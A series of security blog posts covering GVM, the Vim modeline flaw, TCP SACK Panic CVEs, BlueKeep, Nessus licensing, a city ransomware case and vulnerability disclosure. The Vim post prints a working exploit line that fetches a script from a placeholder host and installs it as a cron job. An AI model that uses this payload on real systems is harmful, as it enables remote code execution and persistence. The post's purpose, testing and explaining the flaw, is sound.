GVM will be installed very quickly, in just a few minutes, and all GVM components can be managed comfortably with the services. New HTML5 interface is MUCH faster and better. 😉

This latest Vim vulnerability is pretty cute. Technically, when user opens malformed file with vim, he executes some bash script. This script can download something malicious, for example a cryptolocker, and then can add some cron job to execute it at a convinient time. Anything!

For example,

echo ':!curl "https://dangerous-site.com/very_dangerous_script.sh" > /tmp/malscript.sh; chmod +x /tmp/malscript.sh; crontab -l > mycron; echo "* * * * * /tmp/malscript.sh" >> mycron; crontab mycron; rm mycron||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="' > test.txt

The only problem is that "Debian, Ubuntu, Gentoo, OSX, etc. by default disable modelines for security reasons". 😉 So, it makes this vulnerability practically unexploitable in a real life.

To check it in Ubuntu I needed to

sudo vim /etc/vim/vimrc
...
set modeline
set modelines=5
...

I couldn't make it work with current #Vim version in #CentOS 7.6.1810 with modeline set. 😟 Probably because the version is too old "VIM - Vi IMproved 7.4". soji256 also couldn't run it in CentOS. So, it seems that to be successfully attacked the target CentOS user should install Vim from sources, but not the last version, for example this one (I haven't check it), and use it with modeline enabled. This is probably pretty rare combination. 🙂 But if you could run it with default CentOS Vim, please let me know at @leonov_av, I'm curious 😉

I usually don't write about politics here, but the latest scandal about US cyber attacks on Russian Power Grid is pretty hilarious. OMG, who would have thought that Americans can do such creepy offensive stuff?! What a shock! 😏 What is the most interesting, The New York Times writes about it, not RT or Sputnik. Now, according to mr. president journalists or this newspaper "committed treason" and at the same time it's "also, not true". BTW, I thought calling citizens "the enemy of the people" is something from the Soviet era. In which direction are you guys moving? 🙂

Joking aside, I find It quite sick and dangerous. 😐 I don't like the rhetoric that if State A makes attacks on critical infrastructure of State B (first of all, what are the proofs? accurate attack attributions is almost impossible nowadays), State B should do the same with State A using undisclosed vulnerabilities and backdoors. It's not "equivalent of land mines" at all, it's a full scaled offensive operation. At a minimum, this leads to the fragmentation of global IT and InfoSecurity market and escalate the witch-hunt (#ERPScan, #Kaspersky, #Huawei, whatever next). Just because you can no longer trust foreign vendors. Less competition means lower product quality and higher prices for the customers.

Yay. Now it's official: TCP SACK PANIC - Kernel vulnerabilities

CVE-2019-11477 - A sequence of SACKs may be crafted such that one can trigger an integer overflow, leading to a kernel panic.
CVE-2019-11478 - It is possible to send a crafted sequence of SACKs which will fragment the TCP retransmission queue.
CVE-2019-11479 - An attacker can force the Linux kernel to segment its responses into multiple TCP segments, each of which contains only 8 bytes of data. This drastically increases the bandwidth required to deliver the same amount of data.

Disable SACK processing (/proc/sys/net/ipv4/tcp_sack set to 0) or install patches! 😉 Pretty simple DoS-exploits for these vulnerabilities should appear soon...
#TCPSACKPANIC #Linux #Kernel #SACK

30 days have passed since the poll, and NO massive cyber attack based on #BlueKeep vulnerability occurred. What conclusions can we draw?

Well, it is very difficult to predict a real exploitability potential of the vulnerability based only on it's description. Even if it is RCE, even if the well-known vendors confirmed that they were able to write an exploit (but did not publish it), this does not guarantee that the vulnerability will be widely used in cyber attacks soon and so you should give it a highest priority in remediation.

That does not exclude the possibility that RCE exploit for this vulnerability can be currently used in highly focused attacks, and the real action will occur with the leak of this exploit. Will it happen tomorrow? Who knows.

Three days ago NASA published very interesting document "Cybersecurity Management and Oversight at the Jet Propulsion Laboratory". Most media outlets mentioned it as "#NASA was hacked using #RaspberryPi". Yes, this is true, you can find information about this incident in the document by "April 2018". But it's not even the most interesting part. There are many great and funny details about their CMDB-like system "Information Technology Security Database (ITSDB)", lack of network segmentation, unpathched vulnerabilities, etc. And all this in ordinary, not very formal language. It seems like a good example how Information Security should be and should NOT be managed in a big organization and an awesome weekend reading. 😊

A great set of Software Development tips "Things I Learnt The Hard Way (in 30 Years of Software Development)". The blog is about .Net and TDD (test-driven development), but the tips are quite universal. I totally agree with everything that I have read there, especially with the tips related to documentation and "be ready to throw your code away[...] Your code is not a wall: if you have to throw it always, it is not wasted material. Surely it means your time writing code was lost, but you got a better understanding about the problem now." I think such things should be taught in schools. It's really important for the right mindset.

I did not find this on Tenable’s website, only in the blog post of the Russian distributor, but it seems that Nessus Professional 8.5, that will be released tomorrow, will behave differently after the license expiration. On the first day it will switch off all the scanning capabilities and plugin updates. Then within 30 days there will be an option to download existing scan results. After that all functions will be blocked. This is not good news because now any delay in license renewal, which happens in large organizations, will break the whole Vulnerability Management process completely.

The new price will be $2.390 per year, $2.190 for the renewal. There will also be small discounts for those who order licenses for 2 and 3 years (2.5% and 5%).

Currently my favorite city in the USA is Riviera Beach, Florida. 🙂 The story is wonderful (pastebin for those who have problems with access to the site). The city administration was paralyzed by #cryptolocker, because some employee of the local police department clicked on malicious link in email. And of course there were no backups. The situation is ordinary. But the decision is rather unusual, the city council decided to pay ransom $ 600,000 in Bitcoins to get their data back. Without any guarantee that the data will be decrypted and against the direct recommendations of the FBI.

There are no technical details, but if multiple servers were affected there should be problems with network segmentation and unpatched servers (probably, the lack of MS17-010 patch). But none of these problems were mentioned in media. In the media, consil representatives say they need to buy new desktops, laptops and backup system. With such attitude, it probably won't be the last time they encounter such problems. 😏

And, of course, the most intriguing is whether or not they will pay the ransom and get the decryption key. If they spend so much money for nothing, it will be legendary! 🤩

PS: An interesting fact is that they actually bought a new backup system before the incident for $798,419, but it was not deployed on time. 😉 #ransomware

Vulnerability detection plugin vulners.nse is now part of the Nmap. The most famous network scanner in the world! Officially! It took two years since the initial plugin release. Congratulations to the #Vulners Team! Great job!

Everything that I wrote earlier about the new behavior of #Nessus 8.5 after the license expiration, turned out to be true.

#Tenable also edited the GUI a little bit. They separated Report (HTML and CSV) and Export (Nessus v2 XML and Nessus DB). Now you can make report for selected hosts or vulnerabilities in more natural way. They also added these cool buttons to the scan results pages (it may be added some versions before, but I didn’t notice): you can snooze a vulnerability for some time, edit it's criticality or even delete entire host from the scan. And all this you can do for several selected vulnerabilities and hosts. Pretty cool.

They also switched off the limits for Host Discovery scans in Nessus Pro Eval and Nessus Essentials (!!). Well, for Nessus Pro Eval it's not so great, because we remember the time when there were no limits in trial version at all. 😉 But it makes free Nessus Essentials much more useful for organizations.

A few words about the Reuters "Yandex was hacked" article.

1. It is rather sad that modern journalistic investigation may be based on some information from 4 anonymous sources without any proofs. Thy only interesting details are: Western intelligence (yep, once again) as an attacker, Regin malware as a tool, network access for several weeks as a result, user authentication methods in Yandex Email service as a goal. The representative of Yandex responded like "there was an attack at the end of 2018, but our IT security guys successfully dealt with it". So, there is nothing to discuss in any serious way.

2. It seems meaningless to spend so many resources on hacking a free Email service. On the other hand, as we have seen from the scandalous email leaks, important communication in the Russia can be really conducted through free email services Yandex.ru and Mail.ru and even without any encryption. 🙈 I won't give any examples, but you can google it easily. A universal way to access these emails it might be, theoretically, a very tasty goal for any intelligence service.

3. However, from the same email leaks (and, more importantly, details of the criminal case [wiki: eng, rus - much more informative]) we can see easier and more reliable ways of accessing such emails (phishing, fake Wi-Fi hot spots, fake BTS - rus), than trying to attack the Email service directly.

HBO released tv series #Hackerville (nickname of the Romanian city Râmnicu Vâlcea, a famous center of cybercrime). From the trailer it seems that the series will NOT be technically accurate 😝 (OMG, is it too difficult and expensive to hire technical consultant?!), but in any case, it might be fun to watch. 🙂

What I like the most about software vulnerabilities is how "vulnerability", as a quality of a real object (and the computer program is real), literally appears from nothing.
Let's say we have a fully updated server. We turn it off, lock it in a safe and forget about it for half a year. Six months later, we get it, turn it on. It is the same and works absolutely the same. But now it is also exposed to dozens of critical vulnerabilities that, with some (un)luck, can be exploited by any script kiddie. New important characteristic of the material object appeared from nowhere, isn't this magnificent? 🤩 #fridaytalk

Of course, this only happens because many people constantly and comprehensively study software products. But we know so little about it, that it seems almost like magic. For example, do you know how many security researchers analyze Windows or Linux kernel (hundreds, thousands, maybe more)? Who pays them? What is their main motivation? Do they always report what they found to the software vendors?

As for the last question, it seems rather naive to think that all the researchers send their most valuable findings to the vendors even for the bounty. Especially those researchers who work for governments and criminal groups. In my opinion, publicly known vulnerabilities which cause us so much trouble with patching are only the smallest part of all existing vulnerabilities. And it's scary to think what is going on in the main private zone, where all wunderwaffens and all rings-to-rule-them-all should be. 😉

We mainly know how the #NSA processes 0-day vulnerabilities and exploits. Many thanks to #EFF and other organizations who forced them to disclose "Vulnerabilities Equities Policy and Process for the United States Government" (2017). There are no technical details or valuable statistics in it, only some descriptions of bureaucratic procedures, but it shows the attitude. Do you think that in other countries governments deal with vulnerabilities in more ethical way and report them to vendors immediately? I don't think so.

Can money solve the problem with unreported vulnerabilities? Responsible disclosure may become more attractive to independent researchers if the size of bounty will be comparable to the prices on the black market (now it's not). But individual researchers are not the only actors. What about the armies of government hackers that reverse the code in their barracks day after day for a cup of rice? And what about the vulnerabilities that are in fact backdoors left by the vendors intentionally? I don't see any good and safe solutions for this. This is too far from technologies and is mainly concerns geopolitics and violence.

Once again, it's a big, dangerous world, you know. We see only the smallest part of all existing vulnerabilities and, unfortunately, even with them we can't deal effectively.